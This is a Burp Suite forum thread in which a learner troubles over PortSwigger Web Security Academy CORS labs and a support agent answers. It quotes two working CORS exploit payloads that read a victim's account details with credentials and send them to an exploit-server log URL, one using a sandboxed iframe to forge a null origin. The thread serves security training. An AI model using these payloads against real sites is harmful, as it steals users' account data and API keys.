Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Facing problems with CORS module labs

Antonio | Last updated: May 03, 2024 07:27AM UTC

I'm trying to achieve the CORS module labs but something seems wrong with them. For example, in this (https://portswigger.net/web-security/cors/lab-basic-origin-reflection-attack) face the following issues: - My exploit, same as found in Solution section: <script> var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','0ad900cf044f78d4845e81e10014002a.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.send(); function reqListener() { location='/log?key='+this.responseText; }; </script> - Error: Getting "Resource not found" in log page (key parameter). After inspecting the request with burp I can see that the session cookie is not present, so I get a "Unauthorized" message with /accountDetails request. If I change the exploit, adding the "https://" prefix I get this error: "Cross-Origin Request Blocked: The Same Origin Policy disallows reading the remote resource at https://0ad900cf044f78d4845e81e10014002a.web-security-academy.net/accountDetails. (Reason: CORS header ‘Access-Control-Allow-Origin’ missing)". Inspecting the request it has right endpoint, but the cookie value is not the expected In the following lab (https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack) - My exploit, same as found in Solution section: <iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script> var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','0aee004b04bbac1980ed58c600a500ac.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.send(); function reqListener() { location='exploit-0acc00f704c1ace18096571101eb0001.exploit-server.net/log?key='+encodeURIComponent(this.responseText); }; </script>"></iframe> - Error: It is trying to read the resource "https://exploit-0ab7005b04fe6c91800ad93701970039.exploit-server.net/0a49007a04786cee800cda1b005e003c.web-security-academy.net/accountDetails", so it fails and get stuck I modify the exploit adding the prefix "https://" and I get this error: "Cross-Origin Request Blocked: The Same Origin Policy disallows reading the remote resource at https://0a49007a04786cee800cda1b005e003c.web-security-academy.net/accountDetails. (Reason: CORS header ‘Access-Control-Allow-Origin’ missing)". Something is wrong, because inspecting the request it has null origin and right endpoint (as expected), but the cookie value is not the expected (as happened in the previous lab)

Ben, PortSwigger Agent | Last updated: May 03, 2024 08:41AM UTC

Hi Antonio, Out of interest, if you use the https prefix and deliver your exploit do you subsequently see the API key in the logs?

Antonio | Last updated: May 03, 2024 07:30PM UTC

Hi Ben, Following your advice I have used the https prefix and I can see victim's data in the log section. It was confusing me because I was trying to reproduce it by myself as wiener user and it doesn't work as expected, I cannot understand why it works for administrator user (I have tried firefox and chromium). Thank you so much for your time!

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.